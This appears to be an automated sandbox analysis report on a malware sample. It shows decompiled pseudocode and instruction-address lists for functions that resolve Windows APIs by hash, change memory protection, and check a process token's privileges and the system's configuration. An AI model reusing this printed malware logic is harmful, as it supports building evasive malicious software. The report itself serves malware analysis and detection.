				_v40 =  *((intOrPtr*)(_t240 + 0x18));
				_v36 =  *((intOrPtr*)(_t240 + 0x34));
				_v32 =  *((intOrPtr*)(_t240 + 0x30));
				_v28 =  *_t240;
				_v24 = _v124;
				 *_t272 = _t240;
				_v184 = 0;
				_v180 = 0x74;
				_v128 =  *((intOrPtr*)(_v120 + 0x28));
				_v132 = 0;
				_v136 = 0x74;
				_v140 =  &_v44;
				E01392569();
				if(_v128 != 0) {
					_t272 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x0139221f
0x0139222d
0x01392234
0x01392237
0x01392241
0x01392248
0x01392252
0x01392258
0x01392261
0x0139226a
0x0139226d
0x01392273
0x01392277
0x0139227f
0x01392283
0x01392286
0x01392289
0x0139228c
0x0139228f
0x013922a9
0x013922af
0x013922b2
0x013922ba
0x013922be
0x013922c1
0x013922c4
0x013922c7
0x013922ca
0x013922e6
0x01392303
0x01392328
0x0139232a
0x01392333
0x01392336
0x01392340
0x01392343
0x01392346
0x01392349
0x0139234c
0x013923a4
0x013923a4
0x0139254a
0x01392550
0x0139244d
0x01392453
0x0139249f
0x0139249f
0x013924bc
0x013924e2
0x013924f0
0x013924f3
0x013924f7
0x013924fb
0x01392502
0x01392508
0x0139250a
0x0139251c
0x01392524
0x0139252a
0x01392530
0x01392536
0x00000000
0x00000000
0x0139253c
0x0139249f
0x0139245b
0x01392469
0x01392471
0x01392474
0x01392476
0x0139247c
0x01392488
0x0139248e
0x01392491
0x01392494
0x0139238a
0x0139238a
0x013923d8
0x013923de
0x013923e4
0x013923ea
0x013923f0
0x013923f5
0x013923fb
0x013923fe
0x01392401
0x01392409
0x01392411
0x01392414
0x01392417
0x0139241d
0x01392423
0x0139242e
0x01392362
0x01392368
0x01392368
0x013923c5

APIs

VirtualProtect.KERNELBASE ref: 0139228F
VirtualProtect.KERNELBASE ref: 01392328

Strings

t, xrefs: 01392409

Memory Dump Source

Source File: 00000000.00000002.320429909.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: 7956fa2312643a597fdcbfaa6a4d1432c9ce6dd8e6002b0bd39b7873428b22af
Instruction ID: b7f5805c8ee437f6756fbed743549b96649c77bdf89d3ba53b69e4e2fa8c9fbd
Opcode Fuzzy Hash: 7956fa2312643a597fdcbfaa6a4d1432c9ce6dd8e6002b0bd39b7873428b22af
Instruction Fuzzy Hash: 708198B4E046099FDB04DFA9C180A9EFBF0BF88314F65856AE958AB351D330A941CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01392439, Relevance: 1.6, APIs: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 01392508

Memory Dump Source

Source File: 00000000.00000002.320429909.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8236c2e19c1d00af7cbb47a3bb3cbd68a84d307cb5cd87352a8309bcc8ca5344
Instruction ID: c5d0c872b2ccf78e1f1cdcd9b653fdaa119fa1c29bc4e5473e53ba9865cfa3a3
Opcode Fuzzy Hash: 8236c2e19c1d00af7cbb47a3bb3cbd68a84d307cb5cd87352a8309bcc8ca5344
Instruction Fuzzy Hash: E531E9B5E006289FDB24CF69C98069DB7F1BF88704F158299D94DA7306D731AE41CF81

Uniqueness

Uniqueness Score: -1.00%

Function 01391D89, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 01391EA8

Memory Dump Source

Source File: 00000000.00000002.320429909.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction ID: a86f18ca38eaf7d00a09872f59831ce04a7de157ad432bd739bc934d7a0ec921
Opcode Fuzzy Hash: 0b9b42ba2fdb08c7cefa25f605df8f332aac007ccc48bea5617a17140e49e517
Instruction Fuzzy Hash: E041D2B5E0421A8FDB04DFA8C4906AEBBF1FF48724F19852EE549AB340D735A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 4832 Parent PID: 668 rundll32.exeCOMMON

Executed Functions

Function 6E8907CC, Relevance: 5.1, APIs: 3, Instructions: 628
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E6E8907CC(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t152;
				void* _t155;
				signed char* _t156;
				char _t159;
				intOrPtr* _t163;
				void* _t177;
				intOrPtr _t186;
				char _t187;
				void* _t192;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t208;
				void* _t209;
				void* _t211;
				void* _t212;
				void* _t219;
				void* _t232;
				void* _t234;
				void* _t237;
				void* _t240;
				void* _t243;
				void* _t246;
				void* _t250;
				void* _t254;
				void* _t255;
				void* _t257;
				long _t258;
				void* _t261;
				void* _t264;
				int _t267;
				void* _t268;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t278;
				int _t280;
				intOrPtr* _t284;
				signed char _t288;
				signed char _t289;
				signed int _t293;
				void* _t314;
				void* _t319;
				void* _t355;
				void* _t364;
				void* _t369;
				void* _t374;
				void* _t375;
				void* _t376;
				void* _t377;
				void* _t378;
				void* _t379;
				void* _t385;
				void* _t392;
				signed int _t397;
				intOrPtr* _t400;
				void* _t403;
				signed int _t405;
				void* _t407;
				void* _t408;
				void* _t413;
				intOrPtr* _t417;
				void* _t419;
				void** _t421;
				void* _t422;
				void* _t423;
				void* _t424;

				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t423 = _t422 - 0x1e0;
				_t407 = __ecx;
				_t152 =  *0x6e89d1f8;
				if(_t152 == 0x16a9e13a) {
					_t152 = E6E893558(0x30);
					 *0x6e89d1f8 = _t152;
				}
				if( *((char*)(_t152 + 0xb)) == 0 || _t407 != 0) {
					_t408 = _t423 + 0x48;
					E6E8935D4(_t408, 0, 0x11c);
					_t424 = _t423 + 0xc;
					 *((intOrPtr*)(_t424 + 0x48)) = 0x11c;
					_t155 = E6E892F94(0x4bcc7cba, 0xa7920a3, 0x4bcc7cba, 0x4bcc7cba);
					if(_t155 == 0) {
						_t395 =  *0x6e89d1f8;
						_t156 = _t424 + 0x4c;
						_t288 =  *_t156;
						 *(_t395 + 8) = _t288;
						_t289 = _t156[4];
						 *(_t395 + 9) = _t289;
						__eflags = _t156[0x116] - 1;
						_t389 =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xa)) = _t156[0x110];
						 *(_t395 + 4) =  *(_t424 + 0x54);
						 *((char*)(_t395 + 0xc)) = 0 | _t156[0x116] != 0x00000001;
						 *_t395 = (_t289 & 0x000000ff) + ((_t288 & 0x000000ff) << 4) - 0x50;
						_t159 = E6E891094(_t395);
						 *(_t424 + 0x198) = 0;
						 *((char*)( *0x6e89d1f8 + 0xb)) = _t159;
						_t355 = E6E892F94(0xd0443458, 0xd8ece5ad, _t159, _t159);
						__eflags = _t355;
						if(_t355 == 0) {
							L12:
							__eflags = 0;
							 *((char*)( *0x6e89d1f8 + 0x28)) = 0;
							_t163 = E6E8907CC(0x6e89d1f8, 0, _t389, _t395);
							__eflags =  *_t163 - 0x10;
							if( *_t163 >= 0x10) {
								_t293 = 6;
								memcpy(_t424 + 0x164, 0x6e89bc80, _t293 << 2);
								_t424 = _t424 + 0xc;
								_t392 = 0x6e89bc80 + _t293 + _t293;
								 *((intOrPtr*)(_t424 + 0x1c)) = 0;
								E6E88F620(_t424 + 0x24, 0);
								_t397 = 0;
								__eflags = 0;
								do {
									E6E88F8C4(_t424 + 0x24, E6E88F568(_t424 + 0x20) + 4);
									 *((intOrPtr*)(E6E88F558(_t424 + 0x24, E6E88F568(_t424 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t424 + 0x164 + _t397 * 4));
									_t397 = _t397 + 1;
									 *((intOrPtr*)(_t424 + 0x1c)) =  *((intOrPtr*)(_t424 + 0x1c)) + 1;
									__eflags = _t397 - 6;
								} while (_t397 < 6);
								_push(0);
								E6E8954EC(_t424 + 0xc, _t424 + 0x1c, 0x80000002);
								E6E88F6F0(_t424 + 0x20);
								E6E89551C(_t424 + 8, _t424 + 0x1c0, 0x5411b30);
								_t177 = E6E8957D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c0)));
								_t398 = _t177;
								E6E88E054(_t424 + 0x1c0);
								__eflags = _t177;
								if(_t177 != 0) {
									E6E89551C(_t424 + 8, _t424 + 0x1c8, 0xdb1d9b48);
									_t413 = E6E8957D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c8)));
									E6E88E054(_t424 + 0x1c8);
									_t398 = _t424 + 0x1d0;
									E6E89551C(_t424 + 8, _t424 + 0x1d0, 0xf3453dd0);
									_t392 = E6E8957D0(_t424 + 4, __eflags,  *(_t424 + 0x1d0));
									E6E88E054(_t424 + 0x1d0);
									__eflags = _t413;
									if(_t413 != 0) {
										__eflags = _t413 - 5;
										if(_t413 != 5) {
											__eflags = _t413 - 2;
											if(_t413 != 2) {
												goto L58;
											} else {
												__eflags = _t392 - 1;
												if(_t392 != 1) {
													goto L58;
												} else {
													E6E88D098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t375 =  *(_t424 + 4);
														__eflags = _t375;
														if(_t375 == 0) {
															L53:
															_t237 = 1;
														} else {
															__eflags = _t375 - 0xffffffff;
															if(_t375 != 0xffffffff) {
																_t237 = 0;
																__eflags = 0;
															} else {
																goto L53;
															}
														}
														__eflags = _t237;
														if(_t237 == 0) {
															E6E8954C4(_t375);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 5;
												}
											}
										} else {
											__eflags = _t392;
											if(_t392 != 0) {
												__eflags = _t392 - 1;
												if(_t392 == 1) {
													E6E88D098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t376 =  *(_t424 + 4);
														__eflags = _t376;
														if(_t376 == 0) {
															L108:
															_t240 = 1;
														} else {
															__eflags = _t376 - 0xffffffff;
															if(_t376 != 0xffffffff) {
																_t240 = 0;
																__eflags = 0;
															} else {
																goto L108;
															}
														}
														__eflags = _t240;
														if(_t240 == 0) {
															E6E8954C4(_t376);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 4;
												} else {
													goto L58;
												}
											} else {
												E6E88D098(_t424 + 0xc);
												__eflags =  *((char*)(_t424 + 8));
												if( *((char*)(_t424 + 8)) != 0) {
													_t377 =  *(_t424 + 4);
													__eflags = _t377;
													if(_t377 == 0) {
														L41:
														_t243 = 1;
													} else {
														__eflags = _t377 - 0xffffffff;
														if(_t377 != 0xffffffff) {
															_t243 = 0;
															__eflags = 0;
														} else {
															goto L41;
														}
													}
													__eflags = _t243;
													if(_t243 == 0) {
														E6E8954C4(_t377);
													}
												}
												 *(_t424 + 4) = 0;
												_t186 = 3;
											}
										}
									} else {
										__eflags = _t392;
										if(_t392 != 0) {
											L58:
											E6E88D098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t374 =  *(_t424 + 4);
												__eflags = _t374;
												if(_t374 == 0) {
													L61:
													_t234 = 1;
												} else {
													__eflags = _t374 - 0xffffffff;
													if(_t374 != 0xffffffff) {
														_t234 = 0;
														__eflags = 0;
													} else {
														goto L61;
													}
												}
												__eflags = _t234;
												if(_t234 == 0) {
													E6E8954C4(_t374);
												}
											}
											_t186 = 0;
											__eflags = 0;
											 *(_t424 + 4) = 0;
										} else {
											E6E88D098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t378 =  *(_t424 + 4);
												__eflags = _t378;
												if(_t378 == 0) {
													L31:
													_t246 = 1;
												} else {
													__eflags = _t378 - 0xffffffff;
													if(_t378 != 0xffffffff) {
														_t246 = 0;
														__eflags = 0;
													} else {
														goto L31;
													}
												}
												__eflags = _t246;
												if(_t246 == 0) {
													E6E8954C4(_t378);
												}
											}
											 *(_t424 + 4) = 0;
											_t186 = 2;
										}
									}
								} else {
									E6E88D098(_t424 + 0xc);
									__eflags =  *((char*)(_t424 + 8));
									if( *((char*)(_t424 + 8)) != 0) {
										_t379 =  *(_t424 + 4);
										__eflags = _t379;
										if(_t379 == 0) {
											L21:
											_t250 = 1;
										} else {
											__eflags = _t379 - 0xffffffff;
											if(_t379 != 0xffffffff) {
												_t250 = 0;
												__eflags = 0;
											} else {
												goto L21;
											}
										}
										__eflags = _t250;
										if(_t250 == 0) {
											E6E8954C4(_t379);
										}
									}
									 *(_t424 + 4) = 0;
									_t186 = 1;
								}
							} else {
								_t186 = 1;
							}
							 *((intOrPtr*)( *0x6e89d1f8 + 0x24)) = _t186;
							_t187 = E6E8910CC(0xffffffffffffffff);
							_t314 =  *0x6e89d1f8;
							 *((char*)(_t314 + 0x29)) = _t187;
							__eflags =  *_t314 - 0x10;
							 *((intOrPtr*)(_t314 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t314 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6e89d1f8 + 0x2c)) = E6E891140(0xffffffffffffffff, _t392, _t398);
								goto L78;
							} else {
								 *(_t424 + 0x19c) = 0;
								_t364 = E6E892F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
								__eflags = _t364;
								if(_t364 == 0) {
									L74:
									_t196 =  *0x6e89d1f8;
									__eflags =  *((char*)(_t196 + 0x28));
									if( *((char*)(_t196 + 0x28)) == 0) {
										 *((intOrPtr*)(_t196 + 0x2c)) = 3;
									} else {
										 *((intOrPtr*)(_t196 + 0x2c)) = 5;
									}
									goto L78;
								} else {
									_t198 =  *_t364(0xffffffff, 8, _t424 + 0x19c);
									__eflags = _t198;
									if(_t198 == 0) {
										_t199 = E6E89352C(_t398);
										__eflags = _t199;
										if(_t199 != 0) {
											goto L74;
										} else {
											goto L69;
										}
									} else {
										L69:
										 *(_t424 + 0x30) =  *(_t424 + 0x19c);
										 *((char*)(_t424 + 0x34)) = 1;
										 *(_t424 + 0x1a4) = 0;
										_t319 = E6E892F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
										__eflags = _t319;
										if(_t319 != 0) {
											_t232 =  *_t319( *(_t424 + 0x1ac), 1, 0, 0, _t424 + 0x1a4);
											__eflags = _t232;
											if(_t232 == 0) {
												E6E89352C(_t398);
											}
										}
										_t202 =  *(_t424 + 0x1a4);
										__eflags = _t202;
										if(_t202 != 0) {
											E6E88F620(_t424 + 0x18c, _t202);
											_t403 = E6E892F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
											__eflags = _t403;
											if(_t403 == 0) {
												L124:
												E6E88F6F0(_t424 + 0x188);
												goto L72;
											} else {
												_t208 = E6E88F558(_t424 + 0x18c, 0);
												_t209 = E6E88F568(_t424 + 0x188);
												_t211 =  *_t403( *(_t424 + 0x1ac), 1, _t208, _t209, _t424 + 0x1a4);
												__eflags = _t211;
												if(_t211 == 0) {
													_t212 = E6E89352C(_t403);
													__eflags = _t212;
													if(_t212 != 0) {
														goto L124;
													} else {
														goto L116;
													}
												} else {
													L116:
													_t417 = E6E88F558(_t424 + 0x18c, 0);
													E6E88DFFC(_t424 + 0x1b4, 0);
													 *(_t424 + 0x1ac) = 0;
													_t369 = E6E892F94(0xd0443458, 0x39521505, 0xd0443458, 0xd0443458);
													__eflags = _t369;
													if(_t369 != 0) {
														 *_t369( *_t417, _t424 + 0x1ac);
													}
													E6E88E070(_t424 + 0x1b4,  *(_t424 + 0x1ac));
													_t219 = E6E892F94(0x4bcc7cba, 0x1f221433, 0x4bcc7cba, 0x4bcc7cba);
													__eflags = _t219;
													if(_t219 == 0) {
														E6E88E11C(_t424 + 0x1b8 - 8, _t424 + 0x1b8);
														_t419 = E6E894BE0( *((intOrPtr*)(_t424 + 0x1b8)), E6E88E94C( *((intOrPtr*)(_t424 + 0x1b8)), 0x7fffffff));
														E6E88E054(_t424 + 0x1b8);
														E6E88E054(_t424 + 0x1b0);
														E6E88F6F0(_t424 + 0x188);
														__eflags =  *((char*)(_t424 + 0x34));
														if( *((char*)(_t424 + 0x34)) != 0) {
															E6E88BC00(_t424 + 0x30);
														}
														__eflags = _t419 - 0x6df4cf7;
														if(_t419 != 0x6df4cf7) {
															goto L74;
														} else {
															 *((intOrPtr*)( *0x6e89d1f8 + 0x2c)) = 6;
															L78:
															_t192 = E6E892F94(0x4bcc7cba, 0x57154e4e, 0x4bcc7cba, 0x4bcc7cba);
															__eflags = _t192;
															if(_t192 != 0) {
																GetSystemInfo(_t424 + 0x164); // executed
															}
															_t152 =  *0x6e89d1f8;
															_t284 = _t424 + 0x178;
															_t400 = _t424 + 0x170;
															 *((short*)(_t152 + 0xe)) =  *_t284;
															 *((intOrPtr*)(_t152 + 0x10)) =  *((intOrPtr*)(_t284 - 0x10));
															 *((intOrPtr*)(_t152 + 0x14)) =  *((intOrPtr*)(_t284 - 0xc));
															 *((intOrPtr*)(_t152 + 0x18)) =  *_t400;
															 *((intOrPtr*)(_t152 + 0x1c)) =  *((intOrPtr*)(_t400 + 0x10));
															goto L81;
														}
													} else {
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t219;
													}
												}
											}
										} else {
											L72:
											__eflags =  *((char*)(_t424 + 0x34));
											if( *((char*)(_t424 + 0x34)) != 0) {
												E6E88BC00(_t424 + 0x30);
											}
											goto L74;
										}
									}
								}
							}
						} else {
							_t254 =  *_t355(0xffffffff, 8, _t424 + 0x198);
							__eflags = _t254;
							if(_t254 == 0) {
								_t255 = E6E89352C(_t395);
								__eflags = _t255;
								if(_t255 != 0) {
									goto L12;
								} else {
									goto L7;
								}
							} else {
								L7:
								 *(_t424 + 0x14) =  *(_t424 + 0x198);
								 *((char*)(_t424 + 0x18)) = 1;
								 *(_t424 + 0x1a0) = 0;
								_t257 = E6E892F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
								__eflags = _t257;
								if(_t257 != 0) {
									_t280 = GetTokenInformation( *(_t424 + 0x1a8), 2, 0, 0, _t424 + 0x1a0); // executed
									__eflags = _t280;
									if(_t280 == 0) {
										E6E89352C(_t395);
									}
								}
								_t258 =  *(_t424 + 0x1a0);
								__eflags = _t258;
								if(_t258 != 0) {
									E6E88F620(_t424 + 0x3c, _t258);
									_t261 = E6E892F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
									_t395 = _t261;
									__eflags = _t261;
									if(_t261 == 0) {
										L98:
										E6E88F6F0(_t424 + 0x38);
										goto L10;
									} else {
										_t264 = E6E88F558(_t424 + 0x3c, 0);
										_t267 = GetTokenInformation( *(_t424 + 0x1a8), 2, _t264, E6E88F568(_t424 + 0x38), _t424 + 0x1a0); // executed
										__eflags = _t267;
										if(_t267 == 0) {
											_t268 = E6E89352C(_t395);
											__eflags = _t268;
											if(_t268 != 0) {
												goto L98;
											} else {
												goto L85;
											}
										} else {
											L85:
											_t421 = E6E88F558(_t424 + 0x3c, 0);
											_t389 = _t424 + 0x1d8;
											 *(_t424 + 0x1d8 - 0x30) = 0;
											asm("movsd");
											asm("movsb");
											asm("movsb");
											_t395 = E6E892F94(0xd0443458, 0xe6199b6e, 0xd0443458, 0xd0443458);
											__eflags = _t395;
											if(_t395 == 0) {
												goto L98;
											} else {
												_t272 = _t424 + 0x1a8;
												_t273 =  *_t395(_t272 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t272);
												__eflags = _t273;
												if(_t273 == 0) {
													_t274 = E6E89352C(_t395);
													__eflags = _t274;
													if(_t274 != 0) {
														goto L98;
													} else {
														goto L87;
													}
												} else {
													L87:
													_t389 =  *(_t424 + 0x1a8);
													__eflags =  *_t421;
													if( *_t421 <= 0) {
														L92:
														__eflags = _t389;
														if(_t389 == 0) {
															L94:
															_t385 = 1;
														} else {
															__eflags = _t389 - 0xffffffff;
															if(_t389 != 0xffffffff) {
																_t385 = 0;
																__eflags = 0;
															} else {
																goto L94;
															}
														}
														__eflags = _t385;
														if(_t385 == 0) {
															E6E891070(_t389, _t395, _t389);
														}
														goto L98;
													} else {
														_t405 = 0;
														__eflags = 0;
														while(1) {
															_t278 = E6E892F94(0xd0443458, 0x713d44b5, 0xd0443458, 0xd0443458);
															__eflags = _t278;
															if(_t278 != 0) {
																break;
															}
															_t405 = _t405 + 1;
															__eflags = _t405 -  *_t421;
															if(_t405 <  *_t421) {
																continue;
															} else {
																goto L92;
															}
															goto L130;
														}
														_push( *((intOrPtr*)(_t421 + 4 + _t405 * 8)));
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t278;
													}
												}
											}
										}
									}
								} else {
									L10:
									__eflags =  *((char*)(_t424 + 0x18));
									if( *((char*)(_t424 + 0x18)) != 0) {
										E6E88BC00(_t424 + 0x14);
									}
									goto L12;
								}
							}
						}
					} else {
						_push(_t408);
						asm("int3");
						return _t155;
					}
				} else {
					L81:
					return _t152;
				}
				L130:
			}

0x6e8907cc
0x6e8907cd
0x6e8907ce
0x6e8907d0
0x6e8907db
0x6e8907dd
0x6e8907e4
0x6e891063
0x6e891069
0x6e891069
0x6e8907ee
0x6e8907fa
0x6e890806
0x6e89080b
0x6e890818
0x6e890822
0x6e890829
0x6e89082e
0x6e890832
0x6e890836
0x6e89083b
0x6e89083e
0x6e890844
0x6e89084a
0x6e890857
0x6e89085e
0x6e890865
0x6e890868
0x6e89086b
0x6e89086d
0x6e890879
0x6e890886
0x6e890893
0x6e890895
0x6e890897
0x6e890923
0x6e890923
0x6e890929
0x6e89092c
0x6e890931
0x6e890934
0x6e89094c
0x6e89094d
0x6e89094d
0x6e89094d
0x6e890951
0x6e89095a
0x6e89095f
0x6e89095f
0x6e890961
0x6e890972
0x6e890994
0x6e890996
0x6e890997
0x6e89099b
0x6e89099b
0x6e8909a4
0x6e8909b0
0x6e8909b9
0x6e8909cf
0x6e8909df
0x6e8909e4
0x6e8909e8
0x6e8909ed
0x6e8909ef
0x6e890a3f
0x6e890a54
0x6e890a58
0x6e890a5d
0x6e890a6e
0x6e890a83
0x6e890a87
0x6e890a8c
0x6e890a8e
0x6e890ad5
0x6e890ad8
0x6e890b26
0x6e890b29
0x00000000
0x6e890b2b
0x6e890b2b
0x6e890b2e
0x00000000
0x6e890b30
0x6e890b34
0x6e890b39
0x6e890b3e
0x6e890b40
0x6e890b44
0x6e890b46
0x6e890b4d
0x6e890b4d
0x6e890b48
0x6e890b48
0x6e890b4b
0x6e890b51
0x6e890b51
0x00000000
0x00000000
0x00000000
0x6e890b4b
0x6e890b53
0x6e890b55
0x6e890b58
0x6e890b58
0x6e890b55
0x6e890b5d
0x6e890b67
0x6e890b67
0x6e890b2e
0x6e890ada
0x6e890ada
0x6e890adc
0x6e890b1b
0x6e890b1e
0x6e890e90
0x6e890e95
0x6e890e9a
0x6e890e9c
0x6e890ea0
0x6e890ea2
0x6e890ea9
0x6e890ea9
0x6e890ea4
0x6e890ea4
0x6e890ea7
0x6e890ead
0x6e890ead
0x00000000
0x00000000
0x00000000
0x6e890ea7
0x6e890eaf
0x6e890eb1
0x6e890eb4
0x6e890eb4
0x6e890eb1
0x6e890eb9
0x6e890ec3
0x6e890b24
0x00000000
0x6e890b24
0x6e890ade
0x6e890ae2
0x6e890ae7
0x6e890aec
0x6e890aee
0x6e890af2
0x6e890af4
0x6e890afb
0x6e890afb
0x6e890af6
0x6e890af6
0x6e890af9
0x6e890aff
0x6e890aff
0x00000000
0x00000000
0x00000000
0x6e890af9
0x6e890b01
0x6e890b03
0x6e890b06
0x6e890b06
0x6e890b03
0x6e890b0b
0x6e890b15
0x6e890b15
0x6e890adc
0x6e890a90
0x6e890a90
0x6e890a92
0x6e890b6a
0x6e890b6e
0x6e890b73
0x6e890b78
0x6e890b7a
0x6e890b7e
0x6e890b80
0x6e890b87
0x6e890b87
0x6e890b82
0x6e890b82
0x6e890b85
0x6e890b8b
0x6e890b8b
0x00000000
0x00000000
0x00000000
0x6e890b85
0x6e890b8d
0x6e890b8f
0x6e890b92
0x6e890b92
0x6e890b8f
0x6e890b97
0x6e890b97
0x6e890b99
0x6e890a98
0x6e890a9c
0x6e890aa1
0x6e890aa6
0x6e890aa8
0x6e890aac
0x6e890aae
0x6e890ab5
0x6e890ab5
0x6e890ab0
0x6e890ab0
0x6e890ab3
0x6e890ab9
0x6e890ab9
0x00000000
0x00000000
0x00000000
0x6e890ab3
0x6e890abb
0x6e890abd
0x6e890ac0
0x6e890ac0
0x6e890abd
0x6e890ac5
0x6e890acf
0x6e890acf
0x6e890a92
0x6e8909f1
0x6e8909f5
0x6e8909fa
0x6e8909ff
0x6e890a01
0x6e890a05
0x6e890a07
0x6e890a0e
0x6e890a0e
0x6e890a09
0x6e890a09
0x6e890a0c
0x6e890a12
0x6e890a12
0x00000000
0x00000000
0x00000000
0x6e890a0c
0x6e890a14
0x6e890a16
0x6e890a19
0x6e890a19
0x6e890a16
0x6e890a1e
0x6e890a28
0x6e890a28
0x6e890936
0x6e890938
0x6e890938
0x6e890ba2
0x6e890ba5
0x6e890baa
0x6e890bac
0x6e890bb5
0x6e890bc1
0x6e890bc4
0x6e890c92
0x6e890c9a
0x00000000
0x6e890bca
0x6e890bd4
0x6e890be6
0x6e890be8
0x6e890bea
0x6e890c76
0x6e890c76
0x6e890c78
0x6e890c7c
0x6e890c87
0x6e890c7e
0x6e890c7e
0x6e890c7e
0x00000000
0x6e890bf0
0x6e890bfc
0x6e890bfe
0x6e890c00
0x6e89104f
0x6e891054
0x6e891056
0x00000000
0x6e89105c
0x00000000
0x6e89105c
0x6e890c06
0x6e890c06
0x6e890c17
0x6e890c1b
0x6e890c20
0x6e890c32
0x6e890c34
0x6e890c36
0x6e890c4d
0x6e890c4f
0x6e890c51
0x6e890ec9
0x6e890ec9
0x6e890c51
0x6e890c57
0x6e890c5e
0x6e890c60
0x6e890edb
0x6e890ef1
0x6e890ef3
0x6e890ef5
0x6e891030
0x6e891037
0x00000000
0x6e890efb
0x6e890f04
0x6e890f12
0x6e890f2c
0x6e890f2e
0x6e890f30
0x6e891041
0x6e891046
0x6e891048
0x00000000
0x6e89104a
0x00000000
0x6e89104a
0x6e890f36
0x6e890f36
0x6e890f44
0x6e890f4f
0x6e890f5e
0x6e890f70
0x6e890f72
0x6e890f74
0x6e890f81
0x6e890f81
0x6e890f91
0x6e890fa2
0x6e890fa7
0x6e890fa9
0x6e890fbf
0x6e890fe0
0x6e890fe9
0x6e890ff5
0x6e891001
0x6e891006
0x6e89100b
0x6e891011
0x6e891011
0x6e891016
0x6e89101c
0x00000000
0x6e891022
0x6e891024
0x6e890c9d
0x6e890ca9
0x6e890cb0
0x6e890cb2
0x6e890cbc
0x6e890cbc
0x6e890cbe
0x6e890cc0
0x6e890ccf
0x6e890cdb
0x6e890cdf
0x6e890ce2
0x6e890ce5
0x6e890ce8
0x00000000
0x6e890ce8
0x6e890fab
0x6e890fab
0x6e890fb2
0x6e890fb3
0x6e890fb3
0x6e890fa9
0x6e890f30
0x6e890c66
0x6e890c66
0x6e890c66
0x6e890c6b
0x6e890c71
0x6e890c71
0x00000000
0x6e890c6b
0x6e890c60
0x6e890c00
0x6e890bea
0x6e89089d
0x6e8908a9
0x6e8908ab
0x6e8908ad
0x6e890e7a
0x6e890e7f
0x6e890e81
0x00000000
0x6e890e87
0x00000000
0x6e890e87
0x6e8908b3
0x6e8908b3
0x6e8908c4
0x6e8908c8
0x6e8908cd
0x6e8908da
0x6e8908e1
0x6e8908e3
0x6e8908fa
0x6e8908fc
0x6e8908fe
0x6e890cf6
0x6e890cf6
0x6e8908fe
0x6e890904
0x6e89090b
0x6e89090d
0x6e890d05
0x6e890d16
0x6e890d1b
0x6e890d1d
0x6e890d1f
0x6e890e50
0x6e890e54
0x00000000
0x6e890d25
0x6e890d2b
0x6e890d50
0x6e890d52
0x6e890d54
0x6e890e6c
0x6e890e71
0x6e890e73
0x00000000
0x6e890e75
0x00000000
0x6e890e75
0x6e890d5a
0x6e890d5a
0x6e890d65
0x6e890d6c
0x6e890d73
0x6e890d7a
0x6e890d7b
0x6e890d7c
0x6e890d8e
0x6e890d90
0x6e890d92
0x00000000
0x6e890d98
0x6e890d9a
0x6e890db5
0x6e890db7
0x6e890db9
0x6e890e5e
0x6e890e63
0x6e890e65
0x00000000
0x6e890e67
0x00000000
0x6e890e67
0x6e890dbf
0x6e890dbf
0x6e890dbf
0x6e890dc6
0x6e890dca
0x6e890e35
0x6e890e35
0x6e890e37
0x6e890e3e
0x6e890e3e
0x6e890e39
0x6e890e39
0x6e890e3c
0x6e890e42
0x6e890e42
0x00000000
0x00000000
0x00000000
0x6e890e3c
0x6e890e44
0x6e890e46
0x6e890e4b
0x6e890e4b
0x00000000
0x6e890dcc
0x6e890dcc
0x6e890dcc
0x6e890dce
0x6e890dda
0x6e890ddf
0x6e890de1
0x00000000
0x00000000
0x6e890e2f
0x6e890e30
0x6e890e33
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e890e33
0x6e890de3
0x6e890de7
0x6e890dee
0x6e890def
0x6e890def
0x6e890dca
0x6e890db9
0x6e890d92
0x6e890d54
0x6e890913
0x6e890913
0x6e890913
0x6e890918
0x6e89091e
0x6e89091e
0x00000000
0x6e890918
0x6e89090d
